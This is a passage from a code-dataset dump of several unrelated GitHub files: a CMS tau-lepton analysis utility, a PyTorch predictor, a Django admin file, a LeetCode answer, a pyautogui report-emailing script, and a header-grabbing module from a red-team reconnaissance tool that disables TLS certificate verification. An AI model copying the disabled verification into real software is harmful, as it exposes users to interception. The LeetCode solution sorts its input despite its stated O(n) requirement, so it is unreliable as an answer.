file.endswith(\".fq\"):\n remove_file = os.path.join(base_dir,file)\n os.remove(remove_file)\n print(\"Removed %s\" % remove_file)\n\n","repo_name":"mcmero/sv_simu_pipe","sub_path":"scripts/cleanup.py","file_name":"cleanup.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"31631621536","text":"import ROOT \nimport math\nfrom array import array\nimport numpy as np\n\n#############################\n##### General settings ######\n#############################\n\n#########################\n# folder for picotuples #\n#########################\npicoFolder='/eos/user/r/rasp/output/HighPT'\n\n#######################\n# folders for figures #\n#######################\nfiguresFolderFF = '/afs/cern.ch/user/r/rasp/public/HighPT_v2/FF'\nfiguresFolderMetTrigger = '/afs/cern.ch/user/r/rasp/public/HighPT_v2/MetTrigger'\nfiguresFolderSys = '/afs/cern.ch/user/r/rasp/public/HighPT_v2/Sys'\nfiguresFolderWMuNu = '/afs/cern.ch/user/r/rasp/public/HighPT_v2/WMuNu'\nfiguresFolderWTauNu = '/afs/cern.ch/user/r/rasp/public/HighPT_v2/WTauNu_eta'\n\n########################\n# folder for datacards #\n########################\ndatacardsFolder = '/afs/cern.ch/work/r/rasp/public/HighPT_v2/datacards_eta'\n\n###################\n# Cross sections #\n###################\n\nsampleXSec_2016 = { \n\"DYJetsToLL_M-50\" : 6077.22,\n\"TTTo2L2Nu\" : 88.29,\n\"TTToSemiLeptonic\" : 365.35,\n\"TTToHadronic\" : 377.96, \n\"WJetsToLNu_HT-100To200\" : 1395.0*1.166,\n\"WJetsToLNu_HT-200To400\" : 407.9*1.166,\n\"WJetsToLNu_HT-400To600\" : 57.48*1.166,\n\"WJetsToLNu_HT-600To800\" : 12.87*1.166,\n\"WJetsToLNu_HT-800To1200\" : 5.366*1.166,\n\"WJetsToLNu_HT-1200To2500\" : 1.074*1.166,\n\"WJetsToLNu\" : 61526.7 , \n\"ST_tW_antitop_5f_NoFullyHadronicDecays\" : 19.47,\n\"ST_tW_top_5f_NoFullyHadronicDecays\" : 19.47,\n\"ST_t-channel_antitop_4f_InclusiveDecays\" : 80.95,\n\"ST_t-channel_top_4f_InclusiveDecays\" : 136.02,\n\"WW\" : 118.7,\n\"WZ\" : 27.68,\n\"ZZ\" : 12.19,\n\"ZJetsToNuNu_HT-100To200\" : 304.5,\n\"ZJetsToNuNu_HT-200To400\" : 91.82,\n\"ZJetsToNuNu_HT-400To600\" : 13.11,\n\"ZJetsToNuNu_HT-600To800\" : 3.260,\n\"ZJetsToNuNu_HT-800To1200\" : 1.499,\n\"ZJetsToNuNu_HT-1200To2500\" : 0.3430,\n\"WToMuNu_M-200\" : 6.238,\n\"WToTauNu_M-200\" : 6.206\n}\n\nsampleXSec_2017 = {\n\"DYJetsToLL_M-50\" : 6077.22,\n\"TTTo2L2Nu\" : 88.29,\n\"TTToSemiLeptonic\" : 365.35,\n\"TTToHadronic\" : 377.96, \n\"WJetsToLNu_HT-100To200\" : 1395.0*1.166,\n\"WJetsToLNu_HT-200To400\" : 407.9*1.166,\n\"WJetsToLNu_HT-400To600\" : 57.48*1.166,\n\"WJetsToLNu_HT-600To800\" : 12.87*1.166,\n\"WJetsToLNu_HT-800To1200\" : 5.366*1.166,\n\"WJetsToLNu_HT-1200To2500\" : 1.074*1.166,\n\"WJetsToLNu\" : 61526.7 , \n\"ST_tW_antitop_5f_NoFullyHadronicDecays\" : 19.47,\n\"ST_tW_top_5f_NoFullyHadronicDecays\" : 19.47,\n\"ST_t-channel_antitop_4f_InclusiveDecays\" : 80.95,\n\"ST_t-channel_top_4f_InclusiveDecays\" : 136.02,\n\"WW\" : 118.7,\n\"WZ\" : 27.68,\n\"ZZ\" : 12.19,\n\"ZJetsToNuNu_HT-100To200\" : 304.5,\n\"ZJetsToNuNu_HT-200To400\" : 91.82,\n\"ZJetsToNuNu_HT-400To600\" : 13.11,\n\"ZJetsToNuNu_HT-600To800\" : 3.260,\n\"ZJetsToNuNu_HT-800To1200\" : 1.499,\n\"ZJetsToNuNu_HT-1200To2500\" : 0.3430,\n\"WToMuNu_M-200\" : 6.990,\n\"WToTauNu_M-200\" : 7.246\n}\n\nsampleXSec_2018 = {\n\"DYJetsToLL_M-50\" : 6077.22,\n\"TTTo2L2Nu\" : 88.29,\n\"TTToSemiLeptonic\" : 365.35,\n\"TTToHadronic\" : 377.96, \n\"WJetsToLNu_HT-100To200\" : 1395.0*1.166,\n\"WJetsToLNu_HT-200To400\" : 407.9*1.166,\n\"WJetsToLNu_HT-400To600\" : 57.48*1.166,\n\"WJetsToLNu_HT-600To800\" : 12.87*1.166,\n\"WJetsToLNu_HT-800To1200\" : 5.366*1.166,\n\"WJetsToLNu_HT-1200To2500\" : 1.074*1.166,\n\"WJetsToLNu\" : 61526.7 , \n\"ST_tW_antitop_5f_NoFullyHadronicDecays\" : 19.47,\n\"ST_tW_top_5f_NoFullyHadronicDecays\" : 19.47,\n\"ST_t-channel_antitop_4f_InclusiveDecays\" : 80.95,\n\"ST_t-channel_top_4f_InclusiveDecays\" : 136.02,\n\"WW\" : 118.7,\n\"WZ\" : 27.68,\n\"ZZ\" : 12.19,\n\"ZJetsToNuNu_HT-100To200\" : 304.5,\n\"ZJetsToNuNu_HT-200To400\" : 91.82,\n\"ZJetsToNuNu_HT-400To600\" : 13.11,\n\"ZJetsToNuNu_HT-600To800\" : 3.260,\n\"ZJetsToNuNu_HT-800To1200\" : 1.499,\n\"ZJetsToNuNu_HT-1200To2500\" : 0.3430,\n\"WToMuNu_M-200\" : 6.990,\n\"WToTauNu_M-200\" : 7.246\n}\n\neraSamples = {\n\"UL2016_postVFP\" : sampleXSec_2016,\n\"UL2016_preVFP\" : sampleXSec_2016,\n\"UL2017\" : sampleXSec_2017, \n\"UL2018\" : sampleXSec_2018\n}\n\neraLumi = {\n \"UL2016\" : 36300,\n \"UL2016_postVFP\" : 16800,\n \"UL2016_preVFP\" : 19500,\n \"UL2017\" : 41480, \n \"UL2018\" : 59830\n}\n\n\n################\n# Data samples #\n################\n\nsinglemu_2018 = ['SingleMuon_Run2018A','SingleMuon_Run2018B','SingleMuon_Run2018C','SingleMuon_Run2018D']\nsinglemu_2017 = ['SingleMuon_Run2017B','SingleMuon_Run2017C','SingleMuon_Run2017D','SingleMuon_Run2017E','SingleMuon_Run2017F']\n\njetht_2018 = ['JetHT_Run2018A','JetHT_Run2018B','JetHT_Run2018C','JetHT_Run2018D']\njetht_2017 = ['JetHT_Run2017B','JetHT_Run2017C','JetHT_Run2017D','JetHT_Run2017E','JetHT_Run2017F']\n\nmet_2018 = ['MET_Run2018A','MET_Run2018B','MET_Run2018C','MET_Run2018D']\nmet_2017 = ['MET_Run2017B','MET_Run2017C','MET_Run2017D','MET_Run2017E','MET_Run2017F']\n\nsinglemu = {\n \"UL2017\": singlemu_2017,\n \"UL2018\": singlemu_2018\n}\n\njetht = {\n \"UL2017\": jetht_2017,\n \"UL2018\": jetht_2018\n}\n\nmet = {\n \"UL2017\": met_2017,\n \"UL2018\": met_2018\n}\n\ntauWPs = {\n 'Loose': \"4\",\n 'Medium': \"5\",\n 'Tight': \"6\",\n 'VTight': \"7\",\n 'VVTight': \"8\"\n}\n\ntauIntWPs = {\n 'Loose': 4,\n 'Medium': 5,\n 'Tight': 6,\n 'VTight': 7,\n 'VVTight': 8 \n}\n\n#############################\n# Shape uncertainties (JME) #\n#############################\nunc_jme = ['JES','Unclustered']\n\n###############################\n# Shape uncertainties (taues) #\n###############################\nunc_taues = ['taues','taues_1pr','taues_1pr1pi0','taues_3pr','taues_3pr1pi0'] \n\n##################################\n### Settings for FF measurements #\n##################################\n\nxbinsPt2D = [100, 125, 150, 200, 2000] \nxbinsPt = [100, 125, 150, 175, 200, 2000]\nptUncThreshold = 200. # split pt region for stat. uncertainties (<200, >=200.)\n\nptratio2DCuts = {\n 'ptratioLow' : 'jpt_ratio_2<0.85',\n 'ptratioHigh' : 'jpt_ratio_2>=0.85'\n}\nptratio2DThreshold = 0.85\n\n#ptratioCuts = {\n# 'ptratioLow' : 'jpt_ratio_2<0.8',\n# 'ptratioMedium': 'jpt_ratio_2>=0.8&&jpt_ratio_2<0.9',\n# 'ptratioHigh' : 'jpt_ratio_2>=0.9'\n#}\n#ptratioThresholds = [0.8, 0.9]\n\nptratioCuts = {\n 'ptratioLow' : 'jpt_ratio_2<0.85',\n# 'ptratioMedium': 'jpt_ratio_2>=0.8&&jpt_ratio_2<0.9',\n 'ptratioHigh' : 'jpt_ratio_2>=0.85'\n}\nptratioThreshold = 0.85\n\ndecaymode2DCuts = {\n '1prong' : 'dm_2==0',\n '1prongPi0' : '(dm_2==1||dm_2==2)',\n '3prong' : 'dm_2==10',\n '3prongPi0' : 'dm_2==11'\n}\n\ndecaymodeCuts = {\n '1prongPi0' : '(dm_2==1||dm_2==2)',\n '3prong' : 'dm_2==10',\n '3prongPi0' : 'dm_2==11'}\n\nxbinsMass = {\n '1prongPi0': [0.4, 0.6, 0.8, 1.0, 1.2, 1.4, 1.6, 1.8],\n '3prong' : [0.9, 1.0, 1.1, 1.2, 1.3, 1.4],\n '3prongPi0': [1.0, 1.1, 1.2, 1.3, 1.4, 1.5]\n}\n\n# histogram labels (W*->tau+v selection)\nhistLabels = ['','_SB','_mc_wjets','_data_wjets','_data_dijets']\nhistSysLabels = ['_mc_wjets','_data_wjets','_data_dijets']\nptratioLabels = ['_ptratioLow','_ptratioMedium','_ptratioHigh']\nstatUncLabels = ['_unc1','_unc2']\n\nXTitle = {\n 'mt_1' : \"m_{T} (GeV)\",\n 'pt_1' : \"p_{T} (GeV)\",\n 'eta_1' : \"#eta\",\n 'met' : \"E_{T}^{mis} (GeV)\",\n 'm_1' : \"mass (GeV)\"\n}\n\n#######################################\n# Creating shape systematic templates #\n#######################################\ndef ComputeSystematics(h_central, h_sys, name):\n h_up = h_central.Clone(name+\"Up\")\n h_down = h_central.Clone(name+\"Down\")\n nbins = h_central.GetNbinsX()\n for i in range(1,nbins+1):\n x_up = h_sys.GetBinContent(i)\n x_central = h_central.GetBinContent(i)\n x_down = x_central\n if x_up>0:\n x_down = x_central*x_central/x_up\n h_up.SetBinContent(i,x_up)\n h_down.SetBinContent(i,x_down)\n\n return h_up, h_down\n\ndef extractBinLabels(pt,ptratio):\n ratLabel = '_ptratioLow'\n # if ptratio>=ptratioThresholds[0] and ptratio<ptratioThresholds[1]: ratLabel = '_ptratioMedium'\n # if ptratio>=ptratioThresholds[1]: ratLabel = '_ptratioHigh'\n if ptratio>=ptratioThreshold: ratLabel = '_ptratioHigh'\n uncLabel = '_unc1'\n if pt>ptUncThreshold: uncLabel = '_unc2'\n return ratLabel, uncLabel\n\n# Run over set of samples and create histogram\ndef RunSamples(samples,var,weight,cut,xbins,name):\n print('')\n print(\"Running\",name,var,weight,cut)\n nbins = len(xbins)-1\n hist = ROOT.TH1D(name,\"\",nbins,array('d',list(xbins)))\n for sampleName in samples:\n sample = samples[sampleName]\n histsample = sample.CreateHisto(var,weight,cut,xbins,name+\"_\"+sampleName)\n hist.Add(hist,histsample,1.,1.)\n return hist\n\n# Run over set of samples and create histograms for W*->tau+v channel\n# for each sample loop over Tree entries is performed\ndef RunSamplesTauNu(samples,var,unc,xbins,selection,name):\n print('')\n print(\"Running\",name,var,unc,selection)\n nbins = len(xbins)-1\n hists = {} # discionary of histograms\n for label in histLabels:\n histname = name + selection + unc + label\n hists[histname] = ROOT.TH1D(histname,\"\",nbins,array('d',list(xbins)))\n for label in histSysLabels:\n for ptratioLabel in ptratioLabels:\n for uncLabel in statUncLabels:\n histname = name + selection + unc + label + ptratioLabel + uncLabel\n hists[histname] = ROOT.TH1D(histname,\"\",nbins,array('d',list(xbins)))\n\n for sampleName in samples: \n sample = samples[sampleName]\n histsample = sample.CreateHistosTauNu(var,unc,xbins,selection)\n \n for label in histLabels:\n histname = name + selection + unc + label\n histsamplename = sample.sampleName + selection + unc + label\n hists[histname].Add(hists[histname],histsample[histsamplename],1.,1.)\n for label in histSysLabels:\n for ptratioLabel in ptratioLabels:\n for uncLabel in statUncLabels:\n histname = name + selection + unc + label + ptratioLabel + uncLabel\n histsamplename = sample.sampleName + selection + unc + label + ptratioLabel + uncLabel\n hists[histname].Add(hists[histname],histsample[histsamplename],1.,1.)\n\n return hists\n\ndef createBins(nbins,xmin,xmax):\n binwidth = (xmax-xmin)/float(nbins)\n bins = []\n for i in range(0,nbins+1):\n xb = xmin + float(i)*binwidth\n bins.append(xb)\n return bins\n\ndef zeroBinErrors(hist):\n nbins = hist.GetNbinsX()\n for i in range(1,nbins+1):\n hist.SetBinError(i,0.)\n\ndef createUnitHisto(hist,histName):\n nbins = hist.GetNbinsX()\n unitHist = hist.Clone(histName)\n for i in range(1,nbins+1):\n x = hist.GetBinContent(i)\n e = hist.GetBinError(i)\n if x>0:\n rat = e/x\n unitHist.SetBinContent(i,1.)\n unitHist.SetBinError(i,rat)\n\n return unitHist\n\ndef dividePassProbe(passHist,failHist,histName):\n nbins = passHist.GetNbinsX()\n hist = passHist.Clone(histName)\n for i in range(1,nbins+1):\n xpass = passHist.GetBinContent(i)\n epass = passHist.GetBinError(i)\n xfail = failHist.GetBinContent(i)\n efail = failHist.GetBinError(i)\n xprobe = xpass+xfail\n ratio = 1\n eratio = 0\n if xprobe>1e-4:\n ratio = xpass/xprobe\n dpass = xfail*epass/(xprobe*xprobe)\n dfail = xpass*efail/(xprobe*xprobe)\n eratio = math.sqrt(dpass*dpass+dfail*dfail)\n hist.SetBinContent(i,ratio)\n hist.SetBinError(i,eratio)\n\n return hist\n\ndef divideHistos(numHist,denHist,histName):\n nbins = numHist.GetNbinsX()\n hist = numHist.Clone(histName)\n for i in range(1,nbins+1):\n xNum = numHist.GetBinContent(i)\n eNum = numHist.GetBinError(i)\n xDen = denHist.GetBinContent(i)\n eDen = denHist.GetBinError(i)\n ratio = 1\n eratio = 0\n if xNum>1e-7 and xDen>1e-7:\n ratio = xNum/xDen\n rNum = eNum/xNum\n rDen = eDen/xDen\n rratio = math.sqrt(rNum*rNum+rDen*rDen)\n eratio = rratio * ratio\n hist.SetBinContent(i,ratio)\n hist.SetBinError(i,eratio)\n\n return hist\n\ndef histoRatio(numHist,denHist,histName):\n nbins = numHist.GetNbinsX()\n hist = numHist.Clone(histName)\n for i in range(1,nbins+1):\n xNum = numHist.GetBinContent(i)\n eNum = numHist.GetBinError(i)\n xDen = denHist.GetBinContent(i)\n ratio = 1\n eratio = 0\n if xNum>1e-7 and xDen>1e-7:\n ratio = xNum/xDen\n eratio = eNum/xDen\n hist.SetBinContent(i,ratio)\n hist.SetBinError(i,eratio)\n\n return hist\n\n \nclass TauNuCuts:\n def __init__(self,**kwargs):\n self.metCut = kwargs.get('metCut',120.)\n self.mtLowerCut = kwargs.get('mtLowerCut',200.)\n self.mtUpperCut = kwargs.get('mtUpperCut',99999999.)\n self.etaCut = kwargs.get('etaCut',2.3)\n self.ptLowerCut = kwargs.get('ptLowerCut',100.)\n self.ptUpperCut = kwargs.get('ptUpperCut',99999999.)\n self.metdphiCut = kwargs.get('metdphiCut',2.8)\n\nclass FakeFactorHighPt:\n\n def __init__(self,filename):\n print('')\n print('Loading fake factors from file',filename,\" >>>>>\")\n self.fileName = filename\n self.fileFF = ROOT.TFile(self.fileName,\"READ\")\n self.hists = {}\n self.labels = ['dijets','wjets']\n #self.ptbins = ['ptratioLow','ptratioMedium','ptratioHigh']\n self.ptbins = ['ptratioLow','ptratioHigh']\n for ptbin in self.ptbins:\n for label in self.labels: \n name = 'data_' + label + \"_\" + ptbin\n self.hists[name] = self.fileFF.Get(name)\n print(name,self.hists[name])\n name = 'mc_wjets_' + ptbin\n self.hists[name] = self.fileFF.Get(name)\n print(name,self.hists[name])\n\n def getWeight(self,pttau,ptratio,label):\n ptlabel = 'ptratioLow'\n # if ptratio>=ptratioThresholds[0] and ptratio<ptratioThresholds[1]: ptlabel = 'ptratioMedium'\n # if ptratio>=ptratioThresholds[1]: ptlabel = 'ptratioHigh'\n if ptratio>=ptratioThreshold: ptlabel = 'ptratioHigh'\n name = label + \"_\" + ptlabel\n x = pttau\n nbins = self.hists[name].GetNbinsX()\n lowerEdge = self.hists[name].GetBinLowEdge(1)\n upperEdge = self.hists[name].GetBinLowEdge(nbins+1)\n if pttau<lowerEdge: x = lowerEdge+0.001\n if pttau>upperEdge: x = upperEdge-0.001\n weight = self.hists[name].GetBinContent(self.hists[name].FindBin(x))\n error = self.hists[name].GetBinError(self.hists[name].FindBin(x))\n return weight,error\n\nclass sampleHighPt:\n\n def __init__(self,basefolder,era,channel,samplename,isdata,**kwargs):\n filename = basefolder + \"/\" + era + \"/\" + channel + \"/\" + samplename + \".root\"\n self.additionalCut = kwargs.get('additionalCut', '')\n self.sampleName = samplename\n self.sampleFile = ROOT.TFile(filename,\"READ\")\n #self.sampleTree = self.sampleFile.Get(\"tree\")\n self.norm = 1.0\n self.isdata = isdata\n if isdata:\n self.norm = 1.0\n else:\n xsecSamples = eraSamples[era]\n xsec = xsecSamples[samplename]\n histsumw = self.sampleFile.Get(\"weightedEvents\")\n sumw = histsumw.GetSumOfWeights()\n lumi = eraLumi[era]\n self.norm = xsec*lumi/sumw\n print('sample >>> ',self.sampleName,self.norm,self.additionalCut)\n\n def CreateHisto(self,var,weight,cut,bins,name):\n\n nbins = len(bins)-1\n histname = self.sampleName+\"_\"+name\n hist = ROOT.TH1D(histname,\"\",nbins,array('d',list(bins)))\n cutstring = weight+\"*(\"+cut+\")\"\n tree = self.sampleFile.Get(\"tree\")\n if (self.additionalCut!=''):\n cutstring = weight+\"*(\"+cut+\"&&\"+self.additionalCut+\")\"\n tree.Draw(var+\">>\"+histname,cutstring)\n hist.Scale(self.norm)\n return hist\n\n def SetTauNuConfig(self,fakeFactorHighPt,WP,tauNuCuts):\n self.fakeFactorHighPt = fakeFactorHighPt\n self.WP_index = tauIntWPs[WP]\n self.tauNuCuts = tauNuCuts\n\n def CreateHistosTauNu(self,var,unc,bins,selection):\n\n print(\"Running over\",self.sampleName)\n tree = self.sampleFile.Get(\"tree\")\n\n # initialization\n nbins = len(bins)-1\n wp_index = self.WP_index\n cuts = self.tauNuCuts\n fakeFactor = self.fakeFactorHighPt\n\n # creating histograms \n hists = {}\n for label in histLabels:\n name = self.sampleName + selection + unc + label\n hists[name] = ROOT.TH1D(name,\"\",nbins,array('d',list(bins)))\n for label in histSysLabels:\n for ptratioLabel in ptratioLabels:\n for uncLabel in statUncLabels:\n name = self.sampleName + selection + unc + label + ptratioLabel + uncLabel\n hists[name] = ROOT.TH1D(name,\"\",nbins,array('d',list(bins)))\n\n # floats\n weight = np.zeros(1,dtype='f')\n pt_1 = np.zeros(1,dtype='f')\n eta_1 = np.zeros(1,dtype='f')\n metdphi_1 = np.zeros(1,dtype='f')\n mt_1 = np.zeros(1,dtype='f')\n met = np.zeros(1,dtype='f')\n jpt_ratio_1 = np.zeros(1,dtype='f')\n m_1 = np.zeros(1,dtype='f')\n\n # booleans\n mettrigger = np.zeros(1,dtype='?')\n metfilter = np.zeros(1,dtype='?')\n extramuon_veto = np.zeros(1,dtype='?')\n extraelec_veto = np.zeros(1,dtype='?')\n extratau_veto = np.zeros(1,dtype='?')\n \n # integers\n njets = np.zeros(1,dtype='i')\n idDeepTau2017v2p1VSe_1 = np.zeros(1,dtype='i')\n idDeepTau2017v2p1VSmu_1 = np.zeros(1,dtype='i')\n idDeepTau2017v2p1VSjet_1 = np.zeros(1,dtype='i')\n genmatch_1 = np.zeros(1,dtype='i')\n\n # branches -> \n # floats \n tree.SetBranchAddress('met',met)\n tree.SetBranchAddress('metdphi_1',metdphi_1)\n tree.SetBranchAddress('mt_1',mt_1)\n tree.SetBranchAddress('pt_1',pt_1)\n tree.SetBranchAddress('m_1',m_1)\n tree.SetBranchAddress('weight',weight)\n tree.SetBranchAddress('eta_1',eta_1)\n tree.SetBranchAddress('jpt_ratio_1',jpt_ratio_1)\n\n # booleans\n tree.SetBranchAddress('mettrigger',mettrigger)\n tree.SetBranchAddress('metfilter',metfilter)\n tree.SetBranchAddress('extramuon_veto',extramuon_veto)\n tree.SetBranchAddress('extraelec_veto',extraelec_veto)\n tree.SetBranchAddress('extratau_veto',extratau_veto)\n\n # integers\n tree.SetBranchAddress('njets',njets)\n tree.SetBranchAddress('idDeepTau2017v2p1VSe_1',idDeepTau2017v2p1VSe_1)\n tree.SetBranchAddress('idDeepTau2017v2p1VSmu_1',idDeepTau2017v2p1VSmu_1)\n tree.SetBranchAddress('idDeepTau2017v2p1VSjet_1',idDeepTau2017v2p1VSjet_1)\n if not self.isdata: tree.SetBranchAddress(\"genmatch_1\",genmatch_1)\n\n nentries = tree.GetEntries()\n\n # run over entries\n for entry in range(0,nentries):\n tree.GetEntry(entry)\n\n # mc selection\n # 0 - select genuine taus\n # 1 - select jet->tau fakes\n # 2 - select not jet->tau fakes\n if not self.isdata:\n if selection=='_tau' and genmatch_1[0]!=5: continue # genuine taus\n if selection=='_fake' and genmatch_1[0]!=0: continue # jet->tau fakes\n if selection=='_notFake' and genmatch_1[0]==0: continue # not jet->tau fakes\n\n # met filters, trigger, vetos\n if not metfilter[0]: continue\n if not mettrigger[0]: continue\n if extraelec_veto[0]: continue\n if extramuon_veto[0]: continue\n if extratau_veto[0]: continue\n if njets[0]!=0: continue\n\n # kinematic cuts\n if pt_1[0]<cuts.ptLowerCut: continue\n if pt_1[0]>cuts.ptUpperCut: continue\n if math.fabs(eta_1[0])>cuts.etaCut: continue\n if mt_1[0]<cuts.mtLowerCut: continue\n if mt_1[0]>cuts.mtUpperCut: continue\n if metdphi_1[0]<cuts.metdphiCut: continue\n if met[0]<cuts.metCut: continue\n\n # tau discriminator against e and mu and jet\n if idDeepTau2017v2p1VSe_1[0]<4: continue\n if idDeepTau2017v2p1VSmu_1[0]<1: continue\n if idDeepTau2017v2p1VSjet_1[0]<1: continue\n\n variable = mt_1[0]\n if var=='pt_1': variable = pt_1[0]\n if var=='eta_1': variable = eta_1[0]\n if var=='met': variable = met[0]\n if var=='m_1': variable = m_1[0]\n\n # signal region\n if idDeepTau2017v2p1VSjet_1[0]>=wp_index:\n name = self.sampleName + selection + unc\n hists[name].Fill(variable,weight[0])\n\n # Sideband region (VVVLoose and not Loose)\n if idDeepTau2017v2p1VSjet_1[0]<4:\n name = self.sampleName + selection + unc + \"_SB\"\n hists[name].Fill(variable,weight[0])\n \n # find label\n refRatioLabel, refUncLabel = extractBinLabels(pt_1[0],jpt_ratio_1[0])\n refLabel = refRatioLabel+refUncLabel\n\n # applying FF and systematics\n for label in ['mc_wjets','data_wjets','data_dijets']:\n weightFF,errorFF = fakeFactor.getWeight(pt_1[0],jpt_ratio_1[0],label)\n name = self.sampleName + selection + unc + '_' + label\n hists[name].Fill(variable,weight[0]*weightFF)\n for ptratioLabel in ptratioLabels:\n for uncLabel in statUncLabels:\n currentLabel = ptratioLabel+uncLabel\n name = self.sampleName + selection + unc + \"_\" + label + currentLabel\n if currentLabel==refLabel: \n hists[name].Fill(variable,weight[0]*(weightFF+errorFF))\n else:\n hists[name].Fill(variable,weight[0]*weightFF)\n\n for hist in hists:\n hists[hist].Scale(self.norm)\n\n return hists\n","repo_name":"cms-tau-pog/TauFW","sub_path":"Fitter/python/HighPT/utilsHighPT.py","file_name":"utilsHighPT.py","file_ext":"py","file_size_in_byte":22076,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"32433639658","text":"#!/usr/bin/env python3\n\nimport requests\nrequests.packages.urllib3.disable_warnings()\n\nR = '\\033[31m' # red\nG = '\\033[32m' # green\nC = '\\033[36m' # cyan\nW = '\\033[0m' # white\nY = '\\033[33m' # yellow\n\ndef headers(target, output, data):\n\tresult = {}\n\tprint ('\\n' + Y + '[!] Headers :' + W + '\\n')\n\ttry:\n\t\trqst = requests.get(target, verify=False, timeout=10)\n\t\tfor k, v in rqst.headers.items():\n\t\t\tprint (G + '[+]' + C + ' {} : '.format(k) + W + v)\n\t\t\tif output != 'None':\n\t\t\t\tresult.update({k:v})\n\texcept Exception as e:\n\t\tprint('\\n' + R + '[-]' + C + ' Exception : ' + W + str(e) + '\\n')\n\t\tif output != 'None':\n\t\t\tresult.update({'Exception':str(e)})\n\n\tif output != 'None':\n\t\theader_output(output, data, result)\n\ndef header_output(output, data, result):\n\tdata['module-Headers'] = result","repo_name":"ryanmrestivo/red-team","sub_path":"Information-Gathering/FinalRecon/modules/headers.py","file_name":"headers.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"21"} +{"seq_id":"22001505015","text":"\"\"\"\nPredicts the class of a given image using a TinyVGG model\n\"\"\"\nimport torch\nimport torchvision\nimport argparse\nimport model_builder\n \nparser = argparse.ArgumentParser()\nparser.add_argument(\"--image\", help=\"Target image to predict the class of\")\nparser.add_argument(\"--model_path\", default=\"models/05_pytorch_going_modular_tinyvgg_args.pth\", \n type=str, help=\"Target model to use for the class prediction\")\n\nargs = parser.parse_args()\n\nIMG_PATH = args.image\nMODEL_PATH = args.model_path\nclass_names = [\"pizza\", \"steak\", \"sushi\"]\n\ndef load_model(path=MODEL_PATH):\n model = model_builder.TinyVGG(\n in_shape=3,\n hidden=10,\n out_shape=3\n )\n model.load_state_dict(torch.load(path))\n return model\n\ndef predict_on_image(image_path=IMG_PATH, model_path=MODEL_PATH):\n model = load_model(MODEL_PATH)\n image = torchvision.io.read_image(str(image_path)).type(torch.float32)\n image = image / 255.\n transform = torchvision.transforms.Resize(size=(64, 64))\n image = transform(image)\n \n model.eval()\n with torch.inference_mode():\n pred_logits = model(image.unsqueeze(dim=0))\n pred_probs = torch.softmax(pred_logits, dim=1)\n pred_label = torch.argmax(pred_probs, dim=1)\n pred_label_class = class_names[pred_label]\n \n print(f\"[INFO] Pred class: {pred_label_class}, Pred prob: {pred_probs.max():.3f}\")\n \nif __name__ == \"__main__\":\n predict_on_image()\n","repo_name":"RumiaGIT/pytorch-research","sub_path":"modular_scripts/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5940096059","text":"# You must write an algorithm that runs in O(n) time.\n\nclass Solution:\n def longestConsecutive(self, nums):\n nums = {i: 0 for i in nums}\n nums = dict(sorted(nums.items()))\n cs = []\n count = 0\n\n for k,v in nums.items():\n if k+1 in nums:\n count += 1\n else:\n cs.append(count+1)\n count = 0\n\n if len(cs) == 0:\n return 0\n\n return max(cs)\n\n\n\n\n\n\n\n\nnums = [100, 4, 200, 1, 3, 2]\nprint(Solution().longestConsecutive(nums))\n","repo_name":"Jeonghoon2/Coding-once-a-day","sub_path":"파이썬 (Python)/leetCode/Medium/128_Longest Consecutive Sequence.py","file_name":"128_Longest Consecutive Sequence.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12229856748","text":"from django.contrib import admin\nfrom .models import Post, Feedback\n\nclass PostAdmin(admin.ModelAdmin):\n list_display = (\"title\", \"slug\", \"user\", \"date\", )\n list_filter = (\"date\", )\n search_field = [\"title\", \"body\"]\n prepopulated_field = {\"slug\": ('title')}\n\n'''class FeedbackAdmin(admin.ModelAdmin):\n list_display = (\"subject\", \"email\")\n list_filter =(\"date\",)\n search_field = [\"subject\", \"email\"]\nadmin.site.register(Feedback, FeedbackAdmin)'''\nadmin.site.register(Post,PostAdmin,)\n","repo_name":"Patrick-Abugu/BrightMass","sub_path":"Site/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31578235800","text":"from sys import displayhook\r\nimport pyautogui\r\nimport pyperclip\r\nimport time\r\n\r\npyautogui.click(x=610, y=740) #iniciando o navegador.\r\ntime.sleep(3)\r\npyautogui.click(x=589, y=45) #selecionando barra de pesquisa.\r\npyperclip.copy(\"https://docs.google.com/spreadsheets/d/1HSFFI4v7ju8qmy4eW12hdl1_BwkEImSw/edit#gid=1634402548\")\r\npyautogui.hotkey(\"ctrl\", \"v\")\r\npyautogui.press(\"enter\") #acessando relatório de vendas\r\ntime.sleep(5)\r\npyautogui.click(x=101, y=115)\r\ntime.sleep(2)\r\npyautogui.click(x=215, y=390)\r\ntime.sleep(2)\r\npyautogui.click(x=467, y=393)\r\ntime.sleep(2)\r\npyautogui.click(x=513, y=446) #realizando download\r\ntime.sleep(3)\r\n\r\nimport pandas as pd\r\ntabela= pd.read_excel(r\"C:\\Users\\gabri\\Downloads\\Vendas - Dez.xlsx\") #importando os dados\r\ndisplayhook(tabela)\r\n\r\nfaturamento= tabela[\"Valor Final\"].sum()\r\nquantidade= tabela[\"Quantidade\"].sum()\r\n\r\n#Enviando Email!\r\npyautogui.click(x=335, y=48)\r\npyperclip.copy(\"https://mail.google.com/mail/u/0/#inbox\")\r\npyautogui.hotkey(\"ctrl\", \"v\")\r\npyautogui.press(\"enter\")\r\ntime.sleep(4)\r\npyautogui.click(x=85, y=159)\r\ntime.sleep(3)\r\npyperclip.copy(\"emailficticio@gmail.com\")\r\npyautogui.hotkey('ctrl', \"v\")\r\npyautogui.press(\"tab\")\r\ntime.sleep(2)\r\npyperclip.copy(\"Relatório de Vendas\")\r\npyautogui.hotkey(\"ctrl\", \"v\")\r\npyautogui.press(\"tab\")\r\n\r\ntexto= f\"\"\"\r\nPrezados, bom dia\r\n\r\nO faturamento de ontem foi de: R${faturamento:,.2f}\r\nA quantidade de produtos foi de: 